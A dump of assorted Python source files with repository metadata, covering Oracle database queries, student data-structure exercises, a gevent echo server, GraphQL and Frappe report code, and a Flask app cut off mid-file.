    sql = """select request_id from atlas_IDDS.requests where scope!='hpo' and ( status in (4,5) or request_id in (select request_id from atlas_idds.transforms where status in (4, 5) and transform_type=2)) order by request_id"""
    sql = """select request_id from atlas_idds.collections where status=4 and total_files > processed_files order by request_id asc"""
    sql = """select request_metadata, processing_metadata from atlas_idds.requests where request_id in (283511)"""
    cursor = connection.cursor()
    cursor.execute(sql)
    rows = cursor.fetchall()
    for row in rows:
        # print(row)
        # print(row[0])
        # The metadata column is a LOB; .read() yields the JSON text.
        data = json.loads(row[0].read())
        print(json.dumps(data, sort_keys=True, indent=4))
        req_ids.append(row[0])
    cursor.close()
    connection.commit()
    db_pool.release(connection)
    print(len(req_ids))
    print(req_ids)
def get_session_pool():
    """Build a cx_Oracle session pool from the 'database'/'default' URL.

    Robustness fix: split the credentials on the *first* ':' and the
    host part on the *last* '@', so passwords containing ':' or '@'
    no longer break the unpacking (plain split() raised ValueError).
    """
    sql_connection = config_get('database', 'default')
    sql_connection = sql_connection.replace("oracle://", "")
    user_pass, tns = sql_connection.rsplit('@', 1)
    user, passwd = user_pass.split(':', 1)
    db_pool = cx_Oracle.SessionPool(user, passwd, tns, min=12, max=20, increment=1)
    return db_pool
def test():
    """Smoke test: open a session pool and dump the request metadata."""
    pool = get_session_pool()
    get_subfinished_requests(pool)
if __name__ == '__main__':
    test()
| [
"wguan.icedew@gmail.com"
] | wguan.icedew@gmail.com |
bee6572bdf3ba51f555860b1eca5428bf08419a8 | ce3bd1c0f8ecb9bbe41ded050c702a35e82191f5 | /khat3680_l04/src/t01.py | 96aab39ff0aa54e8740da4a33efec24ebb80e6df | [] | no_license | khat3680/Data_Sturct_Python | e368133d01cd790206f49e3f401b73961234955a | 4ae75031b3abf36119331064bb119061ae6cd586 | refs/heads/master | 2022-12-10T02:59:01.016483 | 2020-09-11T16:46:31 | 2020-09-11T16:46:31 | 294,755,366 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 392 | py | """
-------------------------------------------------------
[program 1]
-------------------------------------------------------
Author: Anshul Khatri
ID: 193313680
Email: khat3680@mylaurier.ca
Section: CP164 Winter 2020
__updated__ = "2020-02-05"
-------------------------------------------------------
"""
from Food import Food
# Build a stand-alone Food node (no left/right children) and print it.
key_ = Food('Spring Rolls', 1, None, None)
print(key_)
"anshulskhatri@gmail.com"
] | anshulskhatri@gmail.com |
58cf908172c2c19f3b964ed05323f0906af4c37e | 5955ea34fd72c719f3cb78fbb3c7e802a2d9109a | /_STRUCTURES/String/deploy_str.py | b8cdf6f0aa4981933a3160534357a36a9727c468 | [] | no_license | AndreySperansky/TUITION | 3c90ac45f11c70dce04008adc1e9f9faad840b90 | 583d3a760d1f622689f6f4f482c905b065d6c732 | refs/heads/master | 2022-12-21T21:48:21.936988 | 2020-09-28T23:18:40 | 2020-09-28T23:18:40 | 299,452,924 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 219 | py | first = input("Введите первую букву :")
last = input("Введите последнюю букву :")
newStr = ""
# Walk the code points from `first` up to `last` inclusive, appending
# each character; assumes single-character inputs with first <= last.
while first <= last:
    newStr += first
    first = chr(ord(first)+ 1)
print(newStr)
| [
"andrey.speransky@gmail.com"
] | andrey.speransky@gmail.com |
62c04ba164efc46580a8e29802b2c3105d28e244 | 114c1f7ceff04e00591f46eeb0a2eb387ac65710 | /g4g/DS/Graphs/Introductions_and_traversals/10_prac.py | b8308399c38cc993c17302967aa9c44a0beebb89 | [] | no_license | sauravgsh16/DataStructures_Algorithms | 0783a5e6dd00817ac0b6f2b856ad8d82339a767d | d3133f026f972f28bd038fcee9f65784f5d3ea8b | refs/heads/master | 2020-04-23T03:00:29.713877 | 2019-11-25T10:52:33 | 2019-11-25T10:52:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 945 | py | ''' Iterative DFS '''
class Graph(object):
    """Directed graph on vertices 0..V-1 stored as adjacency lists."""

    def __init__(self, vertices):
        self.V = vertices
        self.adj = [[] for _ in range(self.V)]

    def add_edge(self, src, dest):
        """Add a directed edge src -> dest."""
        self.adj[src].append(dest)

    def DFS_Util(self, s, visited):
        """Iterative DFS from s.

        Prints each vertex as it is first reached and returns the visit
        order as a list. (Bug fix: the original used the Python 2 print
        statement `print s,`, a SyntaxError on Python 3.)
        """
        order = []
        stack = [s]
        while stack:
            s = stack.pop()
            if not visited[s]:
                print(s, end=' ')
                order.append(s)
                visited[s] = True
                # Push unvisited neighbours; the visited check on pop
                # tolerates duplicates already on the stack.
                for neighbour in self.adj[s]:
                    if not visited[neighbour]:
                        stack.append(neighbour)
        return order

    def dfs(self):
        """Run DFS over every component; returns the overall visit order."""
        visited = [False] * self.V
        order = []
        for i in range(self.V):
            if not visited[i]:
                order.extend(self.DFS_Util(i, visited))
        return order
# Demo: build a 5-vertex directed graph and traverse it (dfs called below).
g1 = Graph(5)
g1.add_edge(1, 0)
g1.add_edge(0, 2)
g1.add_edge(2, 1)
g1.add_edge(0, 3)
g1.add_edge(1, 4)
g1.dfs() | [
"GhoshSaurav@JohnDeere.com"
] | GhoshSaurav@JohnDeere.com |
25b0c8725635d704fb1f7630816a948146eeb750 | 155fa6aaa4ef31cc0dbb54b7cf528f36743b1663 | /Polymorphism and Abstraction/wild_farm/animals/birds.py | 41ba401c5676fd4ca96f767957cdbdc132188929 | [] | no_license | GBoshnakov/SoftUni-OOP | efe77b5e1fd7d3def19338cc7819f187233ecab0 | 0145abb760b7633ca326d06a08564fad3151e1c5 | refs/heads/main | 2023-07-13T18:54:39.761133 | 2021-08-27T08:31:07 | 2021-08-27T08:31:07 | 381,711,275 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 628 | py | from wild_farm.animals.animal import Bird
from wild_farm.food import Meat
class Hen(Bird):
    """Bird that eats any food, gaining weight in proportion to quantity."""

    weight_gainer = 0.35

    def make_sound(self):
        return "Cluck"

    def feed(self, food):
        quantity = food.quantity
        self.weight += quantity * Hen.weight_gainer
        self.food_eaten += quantity
class Owl(Bird):
    """Bird that accepts only Meat; any other food is refused."""

    weight_gainer = 0.25

    def make_sound(self):
        return "Hoot Hoot"

    def feed(self, food):
        if type(food) == Meat:
            self.weight += food.quantity * Owl.weight_gainer
            self.food_eaten += food.quantity
            return None
        # Refusal message for non-meat food.
        return f"{type(self).__name__} does not eat {type(food).__name__}!"
| [
"boshnakov.g@gmail.com"
] | boshnakov.g@gmail.com |
f47a10d8f4a3f749041c6241c6d0fd65b7ff1a94 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/303/usersdata/296/78905/submittedfiles/testes.py | a1d13bb4b7617dba4b5f62c6fc00e07d617132c1 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 217 | py | # -*- coding: utf-8 -*-
# COMECE AQUI ABAIXO
primeiro = int(input("Digite o primeiro número: "))
segundo = int(input("Digite o segundo número: "))
soma = primeiro + segundo
# Only reveal the sum when it exceeds 10.
if soma > 10:
    print(soma)
else:
    print("Não sei")
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
d7f3500c58054c8e787b5eb8b5ef526a6c1fb2a4 | a43346f397f55edf1f946bae937ae8ae9e21d955 | /vscode2/test_urllib.py | 83d06e098858b90cd428290a2f783d30dd67a847 | [] | no_license | OSYouth/vscode2 | 130474906566a3e90e9a60f5575b68453b4420ca | 385f3cc42b84abfdb958d23e56883450b73e5247 | refs/heads/master | 2021-10-19T11:22:26.210328 | 2019-02-20T15:19:35 | 2019-02-20T15:19:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 179 | py | import urllib.request as urllib
url = "https://www.baidu.com"
print ('第一种方法')
# Performs a real network request; getcode() is the HTTP status code.
response1 = urllib.urlopen(url)
print (response1.getcode())
print (len(response1.read())) | [
"benleolee@163.com"
] | benleolee@163.com |
35ed390982090e723108fa49c6bc3eca2fac169b | ffeedf288d6aa5302abf1771e23c3090b52d7676 | /filemapper/metadata/regex/regexsubtitleextension.py | ee29654357f444d8fda6bbadb7f510ddf6ff2567 | [] | no_license | AsiganTheSunk/python-multimedia-filemapper | f648577f610467abdb9e1ff43783fd1b8ec5b748 | 5daa07c51f3e85df48a0c336633ac150687fe24c | refs/heads/master | 2022-07-07T10:12:43.066571 | 2017-11-02T01:02:20 | 2017-11-02T01:02:20 | 98,677,659 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,813 | py | import re
from filemapper.utils.fileflags import FileFlags as fflags
class RegexSubtitleExtension():
    """Regex engine that detects subtitle directories in media path strings."""

    def __init__(self):
        self.name = 'RegexSubtitleExtension'
        self.supported_fflags = []
        self.supported_season_fflags = []
        # File flags this engine can classify as subtitle content.
        self.supported_subtitle_fflags = [fflags.SUBTITLE_DIRECTORY_FILM_FLAG,
                                          fflags.SUBTITLE_FILM_FLAG,
                                          fflags.SUBTITLE_DIRECTORY_SHOW_FLAG,
                                          fflags.SUBTITLE_SHOW_FLAG,
                                          fflags.SUBTITLE_DIRECTORY_ANIME_FLAG,
                                          fflags.SUBTITLE_ANIME_FLAG]
        return

    def get_subtitles_directory(self, stream, debug=False):
        '''
        This function retrieves the subtitle_directory of the file or directory from the stream using regular expresions
        :param stream: It represents the input string you're parsing
        :param debug: It represents the debug status of the function, default it's False
        :return: 'subs' when a subtitle-like token is found in the stream, '' otherwise
        '''
        # Raw string: the pattern contains regex escapes such as \w.
        _subtitle_directory_patterns = [r'(sub\w{0,6}(?!=\!))']
        try:
            subtitle_directory = re.search(_subtitle_directory_patterns[0], stream, re.IGNORECASE).group(0)
        except AttributeError:
            # re.search returned None (no match): normalize to a blank field.
            subtitle_directory = ''
            return subtitle_directory
        else:
            # Any match is normalized to the canonical directory name 'subs'.
            subtitle_directory = 'subs'
        if debug:
            # Bug fix: the original chained .format() onto print()'s return
            # value (None), raising AttributeError on Python 3.
            print('{extension_engine}: {stream} :: {value}'.format(
                extension_engine=self.name,
                stream=stream,
                value=subtitle_directory))
        return subtitle_directory
| [
"asiganthesunk@gmail.com"
] | asiganthesunk@gmail.com |
95c9ef6893aed8f628771d2758083ee20acee4bc | 9795fe1532849a046895cfb0d4b359144ad575dd | /stringtest.py | a2836ef585b1b18b6d2681aa68771ee248598116 | [
"MIT"
] | permissive | DBeath/python-snippets | 36e2df94d20227b897dd8c9345f9f0dfd733f96b | c9642c37183d947eb8a1a781e47bd70b1306d5ca | refs/heads/master | 2023-03-25T14:26:59.556635 | 2019-10-19T07:26:31 | 2019-10-19T07:26:31 | 118,523,453 | 0 | 0 | MIT | 2021-03-22T16:58:22 | 2018-01-22T22:22:16 | HTML | UTF-8 | Python | false | false | 237 | py | string = ''
# `string` is '' here (assigned above): the following lines demonstrate how
# an empty string behaves in identity and truthiness checks.
print(string is None)   # False: the empty string is not the None singleton
print(not string)       # True: '' is falsy
# NOTE(review): `is` against a literal compares object identity and relies on
# CPython string interning — use == for value comparison.
print(string is '')
print(string is not '')
if string:
    print('String is true')
else:
    print('String is false')
print()
string = 'Test'
# A non-empty string is truthy and still not None.
print(string is None)
print(not string)
| [
"davidgbeath@gmail.com"
] | davidgbeath@gmail.com |
7f9e5d09226cfa9f68d090ddab27a9197d586658 | d7ec67a5ba315103fa6a6bae6dc045f1fecf7add | /normal/FluentPython_code_master/ch03_dict_set/strkeydict0.py | a2dc7df2040e476b3431f97d2ab8bc19527f2a50 | [] | no_license | munezou/PycharmProject | cc62f5e4278ced387233a50647e8197e009cc7b4 | 26126c02cfa0dc4c0db726f2f2cabb162511a5b5 | refs/heads/master | 2023-03-07T23:44:29.106624 | 2023-01-23T16:16:08 | 2023-01-23T16:16:08 | 218,804,126 | 2 | 1 | null | 2023-02-28T23:58:22 | 2019-10-31T15:57:22 | Jupyter Notebook | UTF-8 | Python | false | false | 1,702 | py | '''
StrKeyDict0 converts non-string keys to `str` on lookup
# BEGIN STRKEYDICT0_TESTS
Tests for item retrieval using `d[key]` notation::
>>> d = StrKeyDict0([('2', 'two'), ('4', 'four')])
>>> d['2']
'two'
>>> d[4]
'four'
>>> d[1]
Traceback (most recent call last):
...
KeyError: '1'
Tests for item retrieval using `d.get(key)` notation::
>>> d.get('2')
'two'
>>> d.get(4)
'four'
>>> d.get(1, 'N/A')
'N/A'
Tests for the `in` operator::
>>> 2 in d
True
>>> 1 in d
False
# END STRKEYDICT0_TESTS
'''
# BEGIN STRKEYDICT0
class StrKeyDict0(dict):
    """dict subclass that retries a missing lookup with str(key)."""

    def __missing__(self, key):
        # dict.__getitem__ lands here on a miss; retry once via str(key),
        # but never for keys that are already strings (avoids recursion).
        if not isinstance(key, str):
            return self[str(key)]
        raise KeyError(key)

    def get(self, key, default=None):
        # Mirror __getitem__'s str-fallback, returning default on a miss.
        if key in self:
            return self[key]
        return default

    def __contains__(self, key):
        keys = self.keys()
        return key in keys or str(key) in keys
# END STRKEYDICT0
print('---< start main routine >---')
d = StrKeyDict0([('2', 'two'), ('4', 'four')])
# Lookup by the stored string key, and by int key via the __missing__ hook.
print ('d[2] = {0}'.format(d['2']))
print ('d[4] = {0}'.format(d[4]))
'''
------------------------------------------
if index does not exist, occure error
------------------------------------------
'''
try:
    # Neither 1 nor '1' is present, so this raises KeyError.
    print('d[1] = {0}'.format(d[1]))
except Exception as e:
    print(e)
    pass
finally:
    pass
print()
# get() applies the same str-fallback but returns a default instead of raising.
print ('d.get("2") = {0}'.format(d.get('2')))
print ('d.get(4) = {0}'.format(d.get(4)))
'''
---------------------------------------------
--------------------------------------------
'''
print ('d.get(1, "N/A") = {0}'.format(d.get(1, 'N/A')))
print() | [
"kazumikm0119@pi5.fiberbit.net"
] | kazumikm0119@pi5.fiberbit.net |
e5ea4bf5ff824ea3b88eae215aa89ad3e1b1ff1d | 22b348a0d10519cb1f1da5e886fdf2d3c167cf5a | /myweb/test/gevent_/gevent_server.py | 40d3ecc084fb675cd69f19242f2558e09bd2b098 | [] | no_license | liuluyang/openstack_mogan_study | dab0a8f918ffd17e0a747715998e81304672b75b | 8624f765da7f5aa0c210f0fa945fc50cf8a67b9e | refs/heads/master | 2021-01-19T17:03:15.370323 | 2018-04-12T09:50:38 | 2018-04-12T09:50:38 | 101,040,396 | 1 | 1 | null | 2017-11-01T02:17:31 | 2017-08-22T08:30:22 | Python | UTF-8 | Python | false | false | 872 | py | #coding:utf8
# Minimal echo server built on gevent greenlets (Python 2 print syntax).
import gevent
from gevent import monkey,socket
monkey.patch_all() # needed so blocking stdlib I/O yields to other greenlets
s = socket.socket(2,1) # gevent's socket; same API as the stdlib one
#s.setsockopt(1,2,1)
s.bind(('',8080))
s.listen(1024)
print 'listening ...8080'
def func_accept():
    # Accept loop: spawn one greenlet per connected client.
    while 1:
        cs,userinfo = s.accept()
        print('来了一个客户'+str(userinfo))
        g = gevent.spawn(func_recv,cs) # a new greenlet for every connection
def func_recv(cs):
    # Echo everything the client sends until it disconnects.
    try:
        while 1:
            recv_data = cs.recv(1024)
            print(recv_data) # when this greenlet blocks, gevent switches to another
            if len(recv_data) > 0:
                cs.send(recv_data)
            else:
                cs.close()
                break
    except:
        # NOTE(review): bare except hides every error, including
        # KeyboardInterrupt — catching socket.error would be safer.
        print cs,'is cut connection'
#g1 = gevent.spawn(func_accept)
#g1.join()
func_accept()
| [
"1120773382@qq.com"
] | 1120773382@qq.com |
d0215f9d1c50b64bf0a063ec2baf631dfe83758c | 2b4790d77439d89ad27bdd04bac539283f0dd605 | /cookbook/chapter2/2.7_shortest_match.py | 49bb54fd123247134a394ad7b475f5859077f171 | [] | no_license | ajioy/python-ex | 9fde4bcfe35edeee5050365660a03bdb6b913da1 | 982a3cdf0de0e140faa4cb539f2961b311de2c2a | refs/heads/master | 2020-04-05T14:06:09.909935 | 2018-08-14T14:43:55 | 2018-08-14T14:43:55 | 59,105,033 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 334 | py | import re
# Greedy pattern: (.*) consumes as much as possible between the outer quotes.
greedy_pat = re.compile(r'\"(.*)\"')
text1 = 'Computer says "no."'
print(greedy_pat.findall(text1))
text2 = 'Computer says "no." Phone says "yes."'
# Greedy matching spans from the first quote to the last one.
print(greedy_pat.findall(text2))
# Non-greedy (.*?) stops at the earliest closing quote instead.
lazy_pat = re.compile(r'\"(.*?)\"')
print(lazy_pat.findall(text2))
| [
"ajioy@hotmail.com"
] | ajioy@hotmail.com |
383e36a92c9d5637fc3a45dc325ed151ff97d399 | 8d24fedcadec55acb90aa6eb98d2768a9edf9dba | /professional_browser_automation/elements/element.py | 7d307b17a1d410c53ece73603d055d3403e09961 | [
"Unlicense"
] | permissive | ikostan/ElegantBrowserAutomationWithPythonAndSelenium | bb0a839b775e0a4f6c51b9d8ff1b07cab1624409 | da087036d74a8fbaec3a2875dad5c45c2a85689c | refs/heads/master | 2020-06-24T12:28:38.152860 | 2019-07-29T06:35:29 | 2019-07-29T06:35:29 | 198,962,805 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 662 | py | import selenium
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
class Element:
    """Wrapper that locates a Selenium element eagerly at construction time."""

    def __init__(self, driver: selenium.webdriver, locator: tuple):
        # locator: presumably a (By.<strategy>, value) pair as accepted by
        # expected_conditions — confirm against callers.
        self._driver = driver
        self._locator = locator
        # Resolve immediately; construction fails if the element never appears.
        self._element = self._find()

    def _find(self):
        '''
        Returns element if located else raises TimeOut exception
        :return:
        '''
        # Poll up to 10 seconds for the element to be present in the DOM.
        return WebDriverWait(self._driver, 10).until(EC.presence_of_element_located(self._locator))

    @property
    def element(self):
        # The resolved WebElement (read-only).
        return self._element

    @property
    def driver(self):
        # The WebDriver used to locate the element (read-only).
        return self._driver

    @property
    def locator(self):
        # The locator tuple supplied at construction (read-only).
        return self._locator
| [
"igorkostan@gmail.com"
] | igorkostan@gmail.com |
33a3d15ea5ee1796400d25807404e08938591741 | 83cb1b60faf90982aad32c5979856d6064c00e5b | /infra_validation_engine/utils/__init__.py | 3d7325c5de65d3772012e362ee86b426687bffe2 | [
"Apache-2.0"
] | permissive | boris-vasilev/simple_grid_infra_validation_engine | 25813b3bfa3f82c8bc964b4ac43089a4fea76015 | 66a1410ca42718d559fd12e1e99dbcbc64457645 | refs/heads/master | 2020-09-06T00:58:51.032918 | 2019-10-25T15:24:24 | 2019-10-25T15:24:24 | 220,265,468 | 0 | 0 | Apache-2.0 | 2019-11-07T15:14:21 | 2019-11-07T15:14:20 | null | UTF-8 | Python | false | false | 386 | py | def get_lightweight_component_hosts(augmented_site_level_config):
site_infrastructure = augmented_site_level_config['site_infrastructure']
output = []
for node in site_infrastructure:
node['host'] = "ssh://{fqdn}".format(fqdn=node['fqdn'])
output.append(node)
return output
def get_augmented_site_level_config_file(augmented_site_level_config):
pass | [
"imptodefeat@gmail.com"
] | imptodefeat@gmail.com |
a0af2852cda9a3447ca5115c38f0c38ee2d71b59 | b815438a597af24018277788200caf5da7c4a611 | /Python/Compare-the-Triplets.py | 958faa07f309af0d695639b148fd045d20c1b8ba | [] | no_license | Zahidsqldba07/HackeRank-1 | 0338fe204074a544b8f2510ba6702fc0f648e5e7 | 14a04e72d1599a4b8375623781a952dde323acaa | refs/heads/master | 2023-04-23T10:38:05.993784 | 2020-11-01T17:23:49 | 2020-11-01T17:23:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,160 | py | """
Alice and Bob each created one problem for HackerRank. A reviewer rates the two challenges, awarding points on a scale from 1 to 100
for three categories: problem clarity, originality, and difficulty.
We define the rating for Alice's challenge to be the triplet a = (a[0],a[1],a[2]), and the rating for Bob's challenge to be the triplet
b = (b[0],b[1],b[2]).
Your task is to find their comparison points by comparing a[0] with b[0], a[1] with b[1],and a[2] with b[2].
If a[i] > b[i] ,then Alice is awarded point.
If a[i] < b[i] ,then Bob is awarded point.
If a[i] = b[i] ,then neither person receives a point.
Comparison points is the total points a person earned.
Given a and b, determine their respective comparison points.
Function Description
Complete the function compareTriplets in the editor below. It must return an array of two integers, the first being Alice's score
and the second being Bob's.
compareTriplets has the following parameter(s):
a: an array of integers representing Alice's challenge rating
b: an array of integers representing Bob's challenge rating
Input Format
The first line contains 3 space-separated integers a[0], a[1] and, a[2] describing the respective values in triplet a.
The second line contains 3 space-separated integers b[0], b[1] and, b[2] describing the respective values in triplet b.
Output Format
Return an array of two integers denoting the respective comparison points earned by Alice and Bob.
Sample Input 0
5 6 7
3 6 10
Sample Output 0
1 1
Sample Input 1
17 28 30
99 16 8
Sample Output 1
2 1
"""
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the compareTriplets function below.
def compareTriplets(a, b):
    """Compare two rating sequences element-wise.

    Returns [alice, bob], counting the positions where the respective
    rating is strictly higher; ties award a point to neither.
    Generalized from the hard-coded range(3) to equal-length sequences of
    any size (and no longer raises IndexError on shorter input).
    """
    alice, bob = 0, 0
    for x, y in zip(a, b):
        if x > y:
            alice += 1
        elif x < y:
            bob += 1
    return [alice, bob]
if __name__ == '__main__':
    # HackerRank harness: read both triplets from stdin and write the
    # "alice bob" scores to the file named by OUTPUT_PATH.
    fptr = open(os.environ['OUTPUT_PATH'], 'w')
    a = list(map(int, input().rstrip().split()))
    b = list(map(int, input().rstrip().split()))
    result = compareTriplets(a, b)
    fptr.write(' '.join(map(str, result)))
    fptr.write('\n')
    fptr.close()
| [
"noreply@github.com"
] | Zahidsqldba07.noreply@github.com |
a8f7bb875473b5cc4537aa57b46d6f71ae1d2a84 | 9f3981ecd73bd45178013d441a1ef34f860def0b | /pos_bahrain/pos_bahrain/report/stock_balance_with_prices/stock_balance_with_prices.py | e773fbb9ebeb694178e7719130e9d7ba526b7a73 | [
"MIT"
] | permissive | azhkhn/pos_bahrain | 6e139bf02489c298ad8ac963b52ef676515e84f5 | eae06abb8eb4a9c4465b02178dd981a8ea430511 | refs/heads/master | 2020-09-17T07:00:51.068742 | 2019-11-16T09:28:43 | 2019-11-16T09:28:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,437 | py | # Copyright (c) 2013, 9t9it and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from functools import partial
from toolz import concatv, compose, valmap, merge
from pos_bahrain.utils import key_by, mapf, filterf
def execute(filters=None):
    """Extend the core Stock Balance report with supplier and price columns."""
    from erpnext.stock.report.stock_balance.stock_balance import execute
    columns, data = execute(filters)
    # Default price lists configured in Buying/Selling Settings singles.
    prices = {
        "buying": frappe.db.get_single_value("Buying Settings", "buying_price_list"),
        "selling": frappe.db.get_single_value("Selling Settings", "selling_price_list"),
    }
    return _get_columns(columns, prices), _get_data(data, prices, filters)
def _get_columns(columns, prices):
    """Splice extra columns into the stock-balance column list.

    A Supplier link column is inserted after the first two columns, and two
    Currency columns (labelled with the default buying/selling price list
    names) after the seventh.
    """
    return list(
        concatv(
            columns[:2],
            [
                {
                    "fieldname": "supplier",
                    "fieldtype": "Link",
                    "width": 100,
                    "label": "Supplier",
                    "options": "Supplier",
                }
            ],
            columns[2:7],
            [
                {
                    "fieldname": "buying_price",
                    "fieldtype": "Currency",
                    "width": 100,
                    # Column header is the price list name itself.
                    "label": prices.get("buying"),
                },
                {
                    "fieldname": "selling_price",
                    "fieldtype": "Currency",
                    "width": 100,
                    "label": prices.get("selling"),
                },
            ],
            columns[7:],
        )
    )
def _get_data(data, prices, filters):
    """Augment each stock-balance row with supplier and price values.

    Value positions mirror _get_columns: supplier after the first two
    fields, the two prices after the seventh.
    """
    # Pipeline: run a SQL query -> key result rows by item_code -> keep only
    # the aliased `value` field, yielding {item_code: value}.
    get_query_by_item_code = compose(
        partial(valmap, lambda x: x.get("value")),
        partial(key_by, "item_code"),
        lambda x: frappe.db.sql(
            x,
            # row[0] of every report row is the item code.
            values=merge({"item_codes": mapf(lambda x: x[0], data)}, prices),
            as_dict=1,
        ),
    )
    # Parameterized per price list; restricted to blank/stock UOM prices.
    price_query = """
        SELECT
            ip.item_code AS item_code,
            ip.price_list_rate AS value
        FROM `tabItem Price` AS ip
        LEFT JOIN `tabItem` AS i ON i.name = ip.item_code
        WHERE
            ip.price_list = %({price})s AND
            ip.item_code IN %(item_codes)s AND
            IFNULL(ip.uom, '') IN ('', i.stock_uom)
    """
    suppliers_by_item_code = get_query_by_item_code(
        """
            SELECT
                parent AS item_code,
                default_supplier AS value
            FROM `tabItem Default`
            WHERE parent in %(item_codes)s
        """
    )
    buying_prices_by_item_code = get_query_by_item_code(
        price_query.format(price="buying")
    )
    selling_prices_by_item_code = get_query_by_item_code(
        price_query.format(price="selling")
    )

    def add_fields(row):
        # Splice the looked-up values into the row at the positions the
        # columns were inserted by _get_columns.
        item_code = row[0]
        return list(
            concatv(
                row[:2],
                [suppliers_by_item_code.get(item_code)],
                row[2:7],
                [
                    buying_prices_by_item_code.get(item_code),
                    selling_prices_by_item_code.get(item_code),
                ],
                row[7:],
            )
        )

    def filter_by_supplier(row):
        # No supplier filter selected: keep every row. row[2] is the
        # supplier column inserted by add_fields.
        if not filters.supplier:
            return True
        return filters.supplier == row[2]

    make_data = compose(partial(filterf, filter_by_supplier), partial(map, add_fields))
    return make_data(data)
| [
"sun@libermatic.com"
] | sun@libermatic.com |
40b52f45132e2e3030aae2cd04ce2496b8e8a52c | 76995eda52f3d8b7310ff53fc9b5f8b9ea00287a | /hello world.py | 43b4393dd19e59377c38451746abce7b31c05adc | [] | no_license | tonybelair922/demo_YT | 7bcf3573bb4ae2bdf34d615a5aecd40a48211faf | e748bd33878699f886928449b7926baa11356383 | refs/heads/main | 2023-03-13T09:59:14.937299 | 2021-03-08T07:44:33 | 2021-03-08T07:44:33 | 326,244,329 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,645 | py | """
msg= " Hello world"
for x in range(16):
print(msg)
"""
def my_function():
    """Print the greeting six times."""
    for _ in range(6):
        print("Hello from a function")


my_function()
{
"version" : "3.0",
"user" : "internal-api-beta-user",
"dateGenerated" : "2016-12-23T15:24:07Z",
"status" : "OK",
"data" : [ {
"parameter" : "t_2m:C",
"coordinates" : [ {
"lat" : 50,
"lon" : 10,
"dates" : [ {
"date" : "2016-12-20T00:00:00Z",
"value" : -1.18699,
}, {
"date" : "2016-12-21T00:00:00Z",
"value" : -2.58338,
}, {
"date" : "2016-12-22T00:00:00Z",
"value" : 0.0499817,
} ]
}, {
"lat" : 40,
"lon" : 20,
"dates" : [ {
"date" : "2016-12-20T00:00:00Z",
"value" : -0.186987,
}, {
"date" : "2016-12-21T00:00:00Z",
"value" : -0.0833496,
}, {
"date" : "2016-12-22T00:00:00Z",
"value" : 1.04998,
} ]
} ]
}, {
"parameter" : "relative_humidity_2m:p",
"coordinates" : [ {
"lat" : 50,
"lon" : 10,
"dates" : [ {
"date" : "2016-12-20T00:00:00Z",
"value" : 98.0471,
}, {
"date" : "2016-12-21T00:00:00Z",
"value" : 94.6451,
}, {
"date" : "2016-12-22T00:00:00Z",
"value" : 96.7655,
} ]
}, {
"lat" : 40,
"lon" : 20,
"dates" : [ {
"date" : "2016-12-20T00:00:00Z",
"value" : 77.4957,
}, {
"date" : "2016-12-21T00:00:00Z",
"value" : 78.3308,
}, {
"date" : "2016-12-22T00:00:00Z",
"value" : 64.9726,
} ]
} ]
} ]
} | [
"you@example.com"
] | you@example.com |
cd48574c9c58a59d8434aa039fe557ccc7bf88f9 | 0fd5793e78e39adbfe9dcd733ef5e42390b8cc9a | /python3/16_Web_Services/e_GraphQL/creating/a_graphene/e_input_object_types.py | 409fed8fe1a59002922ab86d2f343886941285b2 | [] | no_license | udhayprakash/PythonMaterial | 3ea282ceb4492d94d401e3bc8bad9bf6e9cfa156 | e72f44e147141ebc9bf9ec126b70a5fcdbfbd076 | refs/heads/develop | 2023-07-08T21:07:33.154577 | 2023-07-03T10:53:25 | 2023-07-03T10:53:25 | 73,196,374 | 8 | 5 | null | 2023-05-26T09:59:17 | 2016-11-08T14:55:51 | Jupyter Notebook | UTF-8 | Python | false | false | 677 | py | import graphene
class Person(graphene.ObjectType):
    # Output type returned by the createPerson mutation below.
    name = graphene.String()
    age = graphene.Int()
class PersonInput(graphene.InputObjectType):
    # Input payload for createPerson; its fields mirror Person.
    name = graphene.String()
    age = graphene.Int()
class Mutation(graphene.ObjectType):
    # Mutation root: createPerson(input: PersonInput) -> Person.
    create_person = graphene.Field(Person, input=PersonInput())

    def resolve_create_person(self, info, input):
        # Echo the input back as a Person instance (no persistence).
        return Person(name=input.name, age=input.age)
schema = graphene.Schema(mutation=Mutation)
mutation = """
mutation {
createPerson(input: { name: "John Doe", age: 30 }) {
name
age
}
}
"""
result = schema.execute(mutation)
print(result.data["createPerson"])
| [
"uday3prakash@gmail.com"
] | uday3prakash@gmail.com |
27a81b2c84baeca740e1eb28aeb702ae4cfe4214 | 30c8dd5f094fa486b006d5c558aba25e64486398 | /serv4.py | ae07520d05c98ff50c16029501b715aca5877c55 | [] | no_license | badillosoft/iot-b | 9942b2501ebb0457b2bd5a3c69855706bce6d486 | 4f608a2b808e4fb9476a73e513664082f34d58ce | refs/heads/master | 2020-03-31T03:59:13.947614 | 2018-10-07T00:05:28 | 2018-10-07T00:05:28 | 151,886,825 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 313 | py | # -*- coding: utf-8 -*-
from flask import Flask
import os

app = Flask(__name__)

@app.route("/saludar")
def saludar():
    # Returns a fixed greeting string.
    return "Hola"

@app.route("/ultra")
def ultra():
